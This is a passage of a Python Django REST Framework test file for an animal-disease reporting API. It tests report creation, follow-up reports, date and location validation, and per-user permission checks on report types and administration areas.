"symptom": "cough,fever,pain",
"sickCount": 4,
"deathCount": 3,
"totalCount": 12,
"nearByCount": 3
})
self.assertEqual(report.created_by, self.krystal)
def test_post_api_follow_report_create_by_parent_guid(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
params = {
"reportId": 123,
"guid": "09d09djjjkdf09df0dfdfdfdf",
"reportTypeId": self.type.id,
"date": "2014-09-01T04:11:15+07:00",
"incidentDate": "2014-09-01",
"administrationAreaId": self.area.id,
"remark": "xxxxxxxxxxxxxx",
"formData": {
"animalType": "dog",
"symptom": "cough,fever,pain",
"sickCount": 4,
"deathCount": 3,
"totalCount": 12,
"nearByCount": 3
},
"negative": True,
"reportLocation": {
"latitude": 13.8082770000000004,
"longitude": 100.7522060000000010
},
"parentGuid": self.report1.guid
}
response = self.client.post(reverse('report-list'), params)
self.assertEqual(response.status_code, 201)
# response_json = json.loads(response.content)
# self.assertTrue(response_json['id'])
# self.assertEqual(response_json['reportId'], 123)
# self.assertEqual(response_json['guid'], '09d09djjjkdf09df0dfdfdfdf')
# self.assertEqual(response_json['reportTypeId'], self.type.id)
# self.assertEqual(response_json['date'], '2014-09-01T04:11:15+07:00')
# self.assertEqual(response_json['incidentDate'], '2014-09-01')
# self.assertEqual(response_json['administrationAreaId'], self.area.id)
# self.assertEqual(response_json['remark'], 'xxxxxxxxxxxxxx')
# self.assertEqual(response_json['negative'], True)
# self.assertEqual(response_json['reportLocation']['type'], 'Point')
# self.assertEqual(response_json['reportLocation']['coordinates'], [100.7522060000000010, 13.8082770000000004])
# self.assertEqual(response_json['formData'], {
# "animalType": "dog",
# "symptom": "cough,fever,pain",
# "sickCount": 4,
# "deathCount": 3,
# "totalCount": 12,
# "nearByCount": 3
# })
# self.assertEqual(response_json['createdBy'], self.taeyeon.get_full_name())
class TZ(datetime.tzinfo):
def utcoffset(self, dt):
return datetime.timedelta(minutes=420)
report = Report.objects.latest('id')
self.assertEqual(report.report_id, 123)
self.assertEqual(report.guid, '09d09djjjkdf09df0dfdfdfdf')
self.assertEqual(report.type, self.type)
self.assertEqual(report.date, datetime.datetime(2014, 9, 1, 4, 11, 15, tzinfo=TZ()))
self.assertEqual(report.incident_date, datetime.date(2014, 9, 1))
self.assertEqual(report.administration_area, self.area)
self.assertEqual(report.administration_location.wkt, self.area.location.wkt)
self.assertEqual(report.remark, 'xxxxxxxxxxxxxx')
self.assertEqual(report.negative, True)
self.assertEqual(report.report_location.wkt, 'POINT (100.7522060000000010 13.8082770000000004)')
self.assertEqual(report.parent, self.report1)
# self.assertEqual(report.priority, PRIORITY_FOLLOW)
self.assertEqual(json.loads(report.form_data), {
"animalType": "dog",
"symptom": "cough,fever,pain",
"sickCount": 4,
"deathCount": 3,
"totalCount": 12,
"nearByCount": 3
})
self.assertEqual(report.created_by, self.taeyeon)
def test_post_api_follow_report_create_by_parent_guid_with_authority(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.krystal.auth_token.key)
params = {
"reportId": 123,
"guid": "09d09djjjkdf09df0dfdfdfdf",
"reportTypeId": self.type.id,
"date": "2014-09-01T04:11:15+07:00",
"incidentDate": "2014-09-01",
"administrationAreaId": self.area.id,
"remark": "xxxxxxxxxxxxxx",
"formData": {
"animalType": "dog",
"symptom": "cough,fever,pain",
"sickCount": 4,
"deathCount": 3,
"totalCount": 12,
"nearByCount": 3
},
"negative": True,
"reportLocation": {
"latitude": 13.8082770000000004,
"longitude": 100.7522060000000010
},
"parentGuid": self.report2.guid
}
response = self.client.post(reverse('report-list'), params)
self.assertEqual(response.status_code, 201)
class TZ(datetime.tzinfo):
def utcoffset(self, dt):
return datetime.timedelta(minutes=420)
report = Report.objects.latest('id')
self.assertEqual(report.report_id, 123)
self.assertEqual(report.guid, '09d09djjjkdf09df0dfdfdfdf')
self.assertEqual(report.type, self.type)
self.assertEqual(report.date, datetime.datetime(2014, 9, 1, 4, 11, 15, tzinfo=TZ()))
self.assertEqual(report.incident_date, datetime.date(2014, 9, 1))
self.assertEqual(report.administration_area, self.area)
self.assertEqual(report.administration_location.wkt, self.area.location.wkt)
self.assertEqual(report.remark, 'xxxxxxxxxxxxxx')
self.assertEqual(report.negative, True)
self.assertEqual(report.report_location.wkt, 'POINT (100.7522060000000010 13.8082770000000004)')
self.assertEqual(json.loads(report.form_data), {
"animalType": "dog",
"symptom": "cough,fever,pain",
"sickCount": 4,
"deathCount": 3,
"totalCount": 12,
"nearByCount": 3
})
self.assertEqual(report.parent, self.report2)
# self.assertEqual(report.priority, PRIORITY_FOLLOW)
self.assertEqual(report.created_by, self.krystal)
def test_post_api_report_create_date_with_multiple_format(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
# FORMAT +0700
params = {
"reportId": 123,
"guid": "09d09djjjkdf09df0dfdfdfdf",
"reportTypeId": self.type.id,
"date": "2014-09-01T04:11:15+0700",
"incidentDate": "2014-09-01",
"administrationAreaId": self.area.id,
"formData": {
"animalType": "dog",
},
"negative": False,
}
response = self.client.post(reverse('report-list'), params)
self.assertEqual(response.status_code, 201)
# response_json = json.loads(response.content)
# self.assertEqual(response_json['date'], '2014-09-01T04:11:15+07:00')
class TZ(datetime.tzinfo):
def utcoffset(self, dt):
return datetime.timedelta(minutes=420)
report = Report.objects.latest('id')
self.assertEqual(report.date, datetime.datetime(2014, 9, 1, 4, 11, 15, tzinfo=TZ()))
# FORMAT Z
params = {
"reportId": 123,
"guid": "09d09djjjkdf09df0zczczczc",
"reportTypeId": self.type.id,
"date": "2014-09-01T04:11:15Z",
"incidentDate": "2014-09-01",
"administrationAreaId": self.area.id,
"formData": {
"animalType": "dog",
},
"negative": False,
}
response = self.client.post(reverse('report-list'), params)
self.assertEqual(response.status_code, 201)
# response_json = json.loads(response.content)
# self.assertEqual(response_json['date'], '2014-09-01T04:11:15+00:00')
class TZ(datetime.tzinfo):
def utcoffset(self, dt):
return datetime.timedelta(0)
report = Report.objects.latest('id')
self.assertEqual(report.date, datetime.datetime(2014, 9, 1, 4, 11, 15, tzinfo=TZ()))
def test_post_api_report_create_date_with_multiple_format_with_authority(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.krystal.auth_token.key)
# FORMAT +0700
params = {
"reportId": 123,
"guid": "09d09djjjkdf09df0dfdfdfdf",
"reportTypeId": self.type.id,
"date": "2014-09-01T04:11:15+0700",
"incidentDate": "2014-09-01",
"administrationAreaId": self.area.id,
"formData": {
"animalType": "dog",
},
"negative": False,
}
response = self.client.post(reverse('report-list'), params)
self.assertEqual(response.status_code, 201)
class TZ(datetime.tzinfo):
def utcoffset(self, dt):
return datetime.timedelta(minutes=420)
report = Report.objects.latest('id')
self.assertEqual(report.date, datetime.datetime(2014, 9, 1, 4, 11, 15, tzinfo=TZ()))
# FORMAT Z
params = {
"reportId": 123,
"guid": "09d09djjjkdf09df0zczczczc",
"reportTypeId": self.type.id,
"date": "2014-09-01T04:11:15Z",
"incidentDate": "2014-09-01",
"administrationAreaId": self.area.id,
"formData": {
"animalType": "dog",
},
"negative": False,
}
response = self.client.post(reverse('report-list'), params)
self.assertEqual(response.status_code, 201)
class TZ(datetime.tzinfo):
def utcoffset(self, dt):
return datetime.timedelta(0)
report = Report.objects.latest('id')
self.assertEqual(report.date, datetime.datetime(2014, 9, 1, 4, 11, 15, tzinfo=TZ()))
'''
def test_post_api_report_create_positive_report_type_and_area_0(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
params = {
"reportId": 123,
"guid": "09d09djjjkdf09df0dfdfdfdf",
"reportTypeId": 0,
"date": "2014-09-01T04:11:15+07:00",
"incidentDate": "2014-09-01",
# "administrationAreaId": 0,
"remark": "xxxxxxxxxxxxxx",
"formData": {},
"negative": False,
"reportLocation": {
"latitude": 13.8082770000000004,
"longitude": 100.7522060000000010
}
}
response = self.client.post(reverse('report-list'), params)
self.assertEqual(response.status_code, 201)
def test_post_api_report_create_positive_report_type_and_area_0_with_authority(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.krystal.auth_token.key)
params = {
"reportId": 123,
"guid": "09d09djjjkdf09df0dfdfdfdf",
"reportTypeId": 0,
"date": "2014-09-01T04:11:15+07:00",
"incidentDate": "2014-09-01",
# "administrationAreaId": 0,
"remark": "xxxxxxxxxxxxxx",
"formData": {},
"negative": False,
"reportLocation": {
"latitude": 13.8082770000000004,
"longitude": 100.7522060000000010
}
}
response = self.client.post(reverse('report-list'), params)
print response
self.assertEqual(response.status_code, 201)
def test_post_api_report_create_positive_report_type_and_area_0_and_reporter_does_not_have_default_area_will_error(self):
self.yoontae = factory.create_user()
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.yoontae.auth_token.key)
params = {
"reportId": 123,
"guid": "09d09djjjkdf09df0dfdfdfdf",
"reportTypeId": 0,
"date": "2014-09-01T04:11:15+07:00",
"incidentDate": "2014-09-01",
# "administrationAreaId": 0,
"remark": "xxxxxxxxxxxxxx",
"formData": {},
"negative": False,
"reportLocation": {
"latitude": 13.8082770000000004,
"longitude": 100.7522060000000010
}
}
response = self.client.post(reverse('report-list'), params)
self.assertEqual(response.status_code, 400)
response_json = json.loads(response.content)
self.assertEqual(response_json['administrationAreaId'], ['This user does not have default admintration area.'])
'''
def test_cannot_post_api_report_if_user_dont_have_authorized_in_report_type(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.jessica.auth_token.key)
params = {
"reportTypeId": self.type.id,
"reportId": 1234,
"guid": "09d09djjjkdf09df0dfdfdfdf",
}
response = self.client.post(reverse('report-list'), params)
self.assertEqual(response.status_code, 400)
response_json = json.loads(response.content)
self.assertEqual(response_json['reportTypeId'], ['You do not have permission to create this report type.'])
def test_cannot_post_api_report_if_user_dont_have_authorized_in_administration_area(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.jessica.auth_token.key)
params = {
"administrationAreaId": self.area.id,
"reportId": 1234,
"guid": "09d09djjjkdf09df0dfdfdfdf",
}
response = self.client.post(reverse('report-list'), params)
self.assertEqual(response.status_code, 400)
response_json = json.loads(response.content)
self.assertEqual(response_json['administrationAreaId'], ['You do not have permission to create this area.'])
def test_cannot_post_api_report_if_administration_area_group_is_not_role_reporter(self):
group_a = factory.add_user_to_new_group(user=self.taeyeon,
type=GROUP_WORKING_TYPE_ALERT_REPORT_ADMINSTRATION_AREA)
area = factory.create_administration_area()
factory.create_group_administration_area(group=group_a, administration_area=area)
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
params = {
"reportId": 123,
"guid": "09d09djjjkdf09df0dfdfdfdf",
"reportTypeId": self.type.id,
"date": "2014-09-01T04:11:15+07:00",
"incidentDate": "2014-09-01",
"administrationAreaId": area.id,
"remark": "xxxxxxxxxxxxxx",
"formData": {
"animalType": "dog",
"symptom": "cough,fever,pain",
"sickCount": 4,
"deathCount": 3,
"totalCount": 12,
"nearByCount": 3
},
"negative": True,
"reportLocation": {
"latitude": 13.8082770000000004,
"longitude": 100.7522060000000010
}
}
response = self.client.post(reverse('report-list'), params)
self.assertEqual(response.status_code, 400)
response_json = json.loads(response.content)
self.assertEqual(response_json['administrationAreaId'], ['You do not have permission to create this area.'])
def test_cannot_post_api_report_if_report_type_group_is_not_role_reporter(self):
group_r = factory.add_user_to_new_group(user=self.taeyeon,
type=GROUP_WORKING_TYPE_ALERT_REPORT_REPORT_TYPE)
newtype = factory.create_report_type()
factory.create_group_report_type(group=group_r, report_type=newtype)
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
params = {
"reportId": 123,
"guid": "09d09djjjkdf09df0dfdfdfdf",
"reportTypeId": newtype.id,
"date": "2014-09-01T04:11:15+07:00",
"incidentDate": "2014-09-01",
"administrationAreaId": self.area.id,
"remark": "xxxxxxxxxxxxxx",
"formData": {
"animalType": "dog",
"symptom": "cough,fever,pain",
"sickCount": 4,
"deathCount": 3,
"totalCount": 12,
"nearByCount": 3
},
"negative": True,
"reportLocation": {
"latitude": 13.8082770000000004,
"longitude": 100.7522060000000010
}
}
response = self.client.post(reverse('report-list'), params)
self.assertEqual(response.status_code, 400)
response_json = json.loads(response.content)
self.assertEqual(response_json['reportTypeId'], ['You do not have permission to create this report type.'])
'''
def test_post_api_report_on_area_that_child_of_permitted_administration_area(self):
area = self.area.add_child(name='Namsan', location=self.area.location)
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
params = {
"reportId": 123,
"guid": "09d09djjjkdf09df0dfdfdfdf",
"reportTypeId": self.type.id,
"date": "2014-09-01T04:11:15+07:00",
"incidentDate": "2014-09-01",
"administrationAreaId": area.id,
"remark": "xxxxxxxxxxxxxx",
"formData": {
"animalType": "dog",
"symptom": "cough,fever,pain",
},
"negative": True
}
response = self.client.post(reverse('report-list'), params)
self.assertEqual(response.status_code, 201)
# response_json = json.loads(response.content)
# self.assertTrue(response_json['id'])
def test_post_api_report_on_area_that_child_of_permitted_administration_area_with_authority(self):
area = self.area.add_child(name='Namsan', location=self.area.location)
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.krystal.auth_token.key)
params = {
"reportId": 123,
"guid": "09d09djjjkdf09df0dfdfdfdf",
"reportTypeId": self.type.id,
"date": "2014-09-01T04:11:15+07:00",
"incidentDate": "2014-09-01",
"administrationAreaId": area.id,
"remark": "xxxxxxxxxxxxxx",
"formData": {
"animalType": "dog",
"symptom": "cough,fever,pain",
},
"negative": True
}
response = self.client.post(reverse('report-list'), params)
self.assertEqual(response.status_code, 201)
'''
def test_staff_can_post_api_report(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.yoona.auth_token.key)
params = {
"reportId": 123,
"guid": "09d09djjjkdf09df0dfdfdfdf",
"reportTypeId": self.type.id,
"date": "2014-09-01T04:11:15+07:00",
"incidentDate": "2014-09-01",
"administrationAreaId": self.area.id,
"remark": "xxxxxxxxxxxxxx",
"formData": {
"animalType": "dog",
"symptom": "cough,fever,pain"
},
"negative": True,
}
response = self.client.post(reverse('report-list'), params)
self.assertEqual(response.status_code, 201)
def test_report_guid_must_be_unique(self):
report = factory.create_report()
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
params = {
"reportId": 123,
"guid": report.guid,
"reportTypeId": self.type.id,
"date": "2014-09-01T04:11:15+07:00",
"incidentDate": "2014-09-01",
"administrationAreaId": self.area.id,
"remark": "xxxxxxxxxxxxxx",
"formData": {
"animalType": "dog",
"symptom": "cough,fever,pain",
"sickCount": 4,
"deathCount": 3,
"totalCount": 12,
"nearByCount": 3
},
"negative": True,
}
response = self.client.post(reverse('report-list'), params)
self.assertEqual(response.status_code, 400)
response_json = json.loads(response.content)
self.assertEqual(response_json['guid'], ['Report with this Guid already exists.'])
def test_report_location_invalid(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
params = {
"reportId": 123,
"guid": "09d09djjjkdf09df0dfdfdfdf",
"reportLocation": {
"lat": 13.8082770000000004,
"lng": 100.7522060000000010
}
}
response = self.client.post(reverse('report-list'), params)
self.assertEqual(response.status_code, 400)
response_json = json.loads(response.content)
self.assertEqual(response_json['reportLocation'], ['Invalid format.'])
# INVALID LATITUDE
params = {
"reportId": 123,
"guid": "09d09djjjkdf09df0dfdfdfdf",
"reportLocation": {
"latitude": 13.8082770000000004,
"longitude": 190.7522060000000010
}
}
response = self.client.post(reverse('report-list'), params)
self.assertEqual(response.status_code, 400)
response_json = json.loads(response.content)
self.assertEqual(response_json['reportLocation'], [u'Longitude must be in between -180 to 180 degree.'])
# INVALID LONGITUDE
params = {
"reportId": 123,
"guid": "09d09djjjkdf09df0dfdfdfdf",
"reportLocation": {
"latitude": -91.8082770000000004,
"longitude": 100.7522060000000010
}
}
response = self.client.post(reverse('report-list'), params)
self.assertEqual(response.status_code, 400)
response_json = json.loads(response.content)
self.assertEqual(response_json['reportLocation'], ['Latitude must be in between -90 to 90 degree.'])
def test_post_api_report_invalid(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
params = {
'negative': True
}
response = self.client.post(reverse('report-list'), params)
self.assertEqual(response.status_code, 400)
response_json = json.loads(response.content)
self.assertEqual(response_json['reportId'], ['This field is required.'])
def test_anonymous_cannot_access_api_report_create(self):
response = self.client.post(reverse('report-list'))
self.assertEqual(response.status_code, 401)
class TestApiReport(APITestCase):
def setUp(self):
try:
ReportType.objects.get(id=0)
except ReportType.DoesNotExist:
ReportType.objects.create(
id=0,
name='Positive Report Type',
form_definition='{}',
version=0,
)
call_command('clear_index', interactive=False, verbosity=0)
self.taeyeon = factory.create_user()
self.jessica = factory.create_user()
self.yoona = factory.create_user(is_superuser=True, is_staff=True)
self.krystal = factory.create_user()
self.authority = factory.create_authority()
self.authority.users.add(self.taeyeon)
self.authority.users.add(self.krystal)
self.type1 = factory.create_report_type(authority=self.authority)
self.type2 = factory.create_report_type(authority=self.authority)
self.area1 = factory.create_administration_area(authority=self.authority)
self.area2 = factory.create_administration_area(authority=self.authority)
self.report1 = factory.create_report(type=self.type1, administration_area=self.area1)
self.report2 = factory.create_report(type=self.type2, administration_area=self.area2)
def test_api_get_report(self):
image = factory.create_report_image(report=self.report1)
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.get(reverse('report-detail', args=[self.report1.id]))
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['id'], self.report1.id)
self.assertEqual(response_json['reportId'], self.report1.report_id)
self.assertEqual(response_json['guid'], self.report1.guid)
self.assertEqual(response_json['reportTypeId'], self.report1.type.id)
self.assertEqual(response_json['reportTypeName'], self.report1.type.name)
self.assertEqual(response_json['date'], self.report1.date.isoformat() + '+00:00')
self.assertEqual(response_json['incidentDate'], self.report1.incident_date.strftime('%Y-%m-%d'))
self.assertEqual(response_json['administrationAreaId'], self.report1.administration_area.id)
# self.assertEqual(response_json['remark'], self.report1.remark)
self.assertEqual(response_json['negative'], self.report1.negative)
self.assertEqual(response_json['formData'], json.loads(self.report1.form_data))
self.assertEqual(response_json['images'][0]['imageUrl'], image.image_url)
self.assertEqual(response_json['images'][0]['thumbnailUrl'], image.thumbnail_url)
self.assertEqual(response_json['images'][0]['note'], image.note)
self.assertEqual(response_json['createdBy'], self.report1.created_by.get_full_name())
self.assertEqual(response_json['createdByContact'], self.report1.created_by.contact)
def test_api_get_report_with_authority(self):
image = factory.create_report_image(report=self.report1)
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.krystal.auth_token.key)
response = self.client.get(reverse('report-detail', args=[self.report1.id]))
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['id'], self.report1.id)
self.assertEqual(response_json['reportId'], self.report1.report_id)
self.assertEqual(response_json['guid'], self.report1.guid)
self.assertEqual(response_json['reportTypeId'], self.report1.type.id)
self.assertEqual(response_json['reportTypeName'], self.report1.type.name)
self.assertEqual(response_json['date'], self.report1.date.isoformat() + '+00:00')
self.assertEqual(response_json['incidentDate'], self.report1.incident_date.strftime('%Y-%m-%d'))
self.assertEqual(response_json['administrationAreaId'], self.report1.administration_area.id)
# self.assertEqual(response_json['remark'], self.report1.remark)
self.assertEqual(response_json['negative'], self.report1.negative)
self.assertEqual(response_json['formData'], json.loads(self.report1.form_data))
self.assertEqual(response_json['images'][0]['imageUrl'], image.image_url)
self.assertEqual(response_json['images'][0]['thumbnailUrl'], image.thumbnail_url)
self.assertEqual(response_json['images'][0]['note'], image.note)
self.assertEqual(response_json['createdBy'], self.report1.created_by.get_full_name())
self.assertEqual(response_json['createdByContact'], self.report1.created_by.contact)
def test_cannot_get_api_get_report_if_user_dont_have_authorized_on_report_type(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.jessica.auth_token.key)
response = self.client.get(reverse('report-detail', args=[self.report1.id]))
self.assertEqual(response.status_code, 403)
'''
def test_api_get_report_that_area_is_child_of_permitted_administration_area(self):
area = self.area1.add_child(name='Namsan', location=self.area1.location)
report = factory.create_report(type=self.type1, administration_area=area)
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.get(reverse('report-detail', args=[report.id]))
self.assertEqual(response.status_code, 403)
response_json = json.loads(response.content)
self.assertEqual(response_json['id'], report.id)
def test_api_get_report_that_area_is_child_of_permitted_administration_area_with_authority(self):
area = self.area1.add_child(name='Namsan', location=self.area1.location)
report = factory.create_report(type=self.type1, administration_area=area)
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.krystal.auth_token.key)
response = self.client.get(reverse('report-detail', args=[report.id]))
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['id'], report.id)
'''
def test_cannot_get_api_get_report_if_user_dont_have_authorized_on_adminstration_area(self):
group_r = factory.add_user_to_new_group_type_report_type(user=self.jessica)
factory.create_group_report_type(group=group_r, report_type=self.type1)
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.jessica.auth_token.key)
response = self.client.get(reverse('report-detail', args=[self.report1.id]))
self.assertEqual(response.status_code, 403)
def test_cannot_get_api_get_report_that_administration_area_group_is_not_has_role_reporter(self):
group_a = factory.add_user_to_new_group(user=self.taeyeon,
type=GROUP_WORKING_TYPE_ALERT_REPORT_ADMINSTRATION_AREA)
area = factory.create_administration_area()
factory.create_group_administration_area(group=group_a, administration_area=area)
report = factory.create_report(created_by=self.taeyeon, type=self.type1,
administration_area=area)
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.get(reverse('report-detail', args=[report.id]))
self.assertEqual(response.status_code, 403)
def test_staff_can_get_api_report(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.yoona.auth_token.key)
response = self.client.get(reverse('report-detail', args=[self.report1.id]))
self.assertEqual(response.status_code, 200)
def test_cannot_get_api_get_report_if_not_exists(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.get(reverse('report-detail', args=[self.report1.id+1000000]))
self.assertEqual(response.status_code, 404)
def test_anonymous_cannot_access_api_get_report(self):
response = self.client.get(reverse('report-detail', args=[self.report1.id]))
self.assertEqual(response.status_code, 401)
@patch('django_redis.get_redis_connection', mock_strict_redis_client)
class TestApiReportTypeList(APITestCase):
def setUp(self):
try:
ReportType.objects.get(id=0)
except ReportType.DoesNotExist:
ReportType.objects.create(
id=0,
name='Positive Report Type',
form_definition='{}',
version=0
)
call_command('clear_index', interactive=False, verbosity=0)
call_command('clear_graph', interactive=False, verbosity=0)
self.taeyeon = factory.create_user()
self.jessica = factory.create_user()
self.yoona = factory.create_user()
self.minah = factory.create_user(is_superuser=True, is_staff=True)
self.krystal = factory.create_user()
self.authority = factory.create_authority()
self.authority.users.add(self.krystal)
self.authority_1 = factory.create_authority()
self.authority_1.users.add(self.taeyeon)
self.authority_2 = factory.create_authority()
self.authority_2.users.add(self.jessica)
self.type1 = factory.create_report_type(name='VX-2014', authority=self.authority)
self.type2 = factory.create_report_type(name='Human', authority=self.authority)
self.type3 = factory.create_report_type(name='Animal', authority=self.authority_2)
self.authority_1.inherits.add(self.authority)
self.authority_1.inherits.add(self.authority_2)
def test_api_list_report_type(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.get(reverse('reporttype-list'))
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(len(response_json), 3)
type1 = response_json[0]
self.assertEqual(type1['id'], self.type1.id)
self.assertEqual(type1['name'], self.type1.name)
self.assertEqual(type1['version'], self.type1.version)
self.assertFalse(type1.has_key('definition'))
type2 = response_json[1]
self.assertEqual(type2['id'], self.type2.id)
self.assertEqual(type2['name'], self.type2.name)
self.assertEqual(type2['version'], self.type2.version)
type3 = response_json[2]
self.assertEqual(type3['id'], self.type3.id)
self.assertEqual(type3['name'], self.type3.name)
self.assertEqual(type3['version'], self.type3.version)
def test_api_list_report_type_with_authority(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.krystal.auth_token.key)
response = self.client.get(reverse('reporttype-list'))
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(len(response_json), 2)
type1 = response_json[0]
self.assertEqual(type1['id'], self.type1.id)
self.assertEqual(type1['name'], self.type1.name)
self.assertEqual(type1['version'], self.type1.version)
self.assertFalse(type1.has_key('definition'))
type2 = response_json[1]
self.assertEqual(type2['id'], self.type2.id)
self.assertEqual(type2['name'], self.type2.name)
self.assertEqual(type2['version'], self.type2.version)
def test_api_list_report_type_only_has_permission_on_those_report_types(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.jessica.auth_token.key)
response = self.client.get(reverse('reporttype-list'))
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(len(response_json), 1)
type1 = response_json[0]
self.assertEqual(type1['id'], self.type3.id)
self.assertEqual(type1['name'], self.type3.name)
self.assertEqual(type1['version'], self.type3.version)
def test_api_list_report_type_only_group_has_role_reporter(self):
group_r = factory.add_user_to_new_group(user=self.taeyeon,
type=GROUP_WORKING_TYPE_ALERT_REPORT_REPORT_TYPE)
newtype = factory.create_report_type()
factory.create_group_report_type(group=group_r, report_type=newtype)
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.get(reverse('reporttype-list'))
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(len(response_json), 3)
def test_api_list_report_type_return_empty_list_if_not_have_any_permission(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.yoona.auth_token.key)
response = self.client.get(reverse('reporttype-list'))
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(len(response_json), 0)
def test_staff_can_get_all_api_list_report_type(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.minah.auth_token.key)
response = self.client.get(reverse('reporttype-list'))
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(len(response_json), 3)
def test_anonymous_cannot_access_api_list_reports(self):
response = self.client.get(reverse('reporttype-list'))
self.assertEqual(response.status_code, 401)
@patch('django_redis.get_redis_connection', mock_strict_redis_client)
class TestApiReportType(APITestCase):
def setUp(self):
try:
ReportType.objects.get(id=0)
except ReportType.DoesNotExist:
ReportType.objects.create(
id=0,
name='Positive Report Type',
form_definition='{}',
version=0,
)
self.taeyeon = factory.create_user()
self.jessica = factory.create_user()
self.yoona = factory.create_user(is_staff=True, is_superuser=True)
self.krystal = factory.create_user()
self.authority = factory.create_authority()
self.authority.users.add(self.taeyeon)
self.authority.users.add(self.krystal)
self.type1 = factory.create_report_type(authority=self.authority)
self.type2 = factory.create_report_type(authority=self.authority)
def test_api_get_report_type(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.get(reverse('reporttype-detail', args=[self.type1.id]))
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['id'], self.type1.id)
self.assertEqual(response_json['name'], self.type1.name)
self.assertEqual(response_json['version'], self.type1.version)
self.assertEqual(response_json['template'], self.type1.template)
self.assertEqual(response_json['definition'], json.loads(self.type1.form_definition))
def test_api_get_report_type_with_authority(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.krystal.auth_token.key)
response = self.client.get(reverse('reporttype-detail', args=[self.type1.id]))
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['id'], self.type1.id)
self.assertEqual(response_json['name'], self.type1.name)
self.assertEqual(response_json['version'], self.type1.version)
self.assertEqual(response_json['template'], self.type1.template)
self.assertEqual(response_json['definition'], json.loads(self.type1.form_definition))
def test_cannot_get_api_get_report_type_if_user_dont_have_authorized(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.jessica.auth_token.key)
response = self.client.get(reverse('reporttype-detail', args=[self.type1.id]))
self.assertEqual(response.status_code, 403)
def test_cannot_get_api_get_report_type_if_group_is_not_has_role_reporter(self):
group_r = factory.add_user_to_new_group(user=self.taeyeon,
type=GROUP_WORKING_TYPE_ALERT_REPORT_REPORT_TYPE)
newtype = factory.create_report_type()
factory.create_group_report_type(group=group_r, report_type=newtype)
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.get(reverse('reporttype-detail', args=[newtype.id]))
self.assertEqual(response.status_code, 403)
def test_cannot_get_api_get_report_type_if_not_exists(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.jessica.auth_token.key)
response = self.client.get(reverse('reporttype-detail', args=[self.type1.id+100]))
self.assertEqual(response.status_code, 404)
def test_staff_can_get_api_get_report(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.yoona.auth_token.key)
response = self.client.get(reverse('reporttype-detail', args=[self.type1.id]))
self.assertEqual(response.status_code, 200)
def test_anonymous_cannot_access_api_get_reports(self):
response = self.client.get(reverse('reporttype-detail', args=[self.type1.id]))
self.assertEqual(response.status_code, 401)
class TestApiReportImageCreate(APITestCase):
def setUp(self):
try:
ReportType.objects.get(id=0)
except ReportType.DoesNotExist:
ReportType.objects.create(
id=0,
name='Positive Report Type',
form_definition='{}',
version=0,
)
call_command('clear_index', interactive=False, verbosity=0)
self.taeyeon = factory.create_user()
self.jessica = factory.create_user()
self.report = factory.create_report(created_by=self.taeyeon)
def test_post_api_report_image(self):
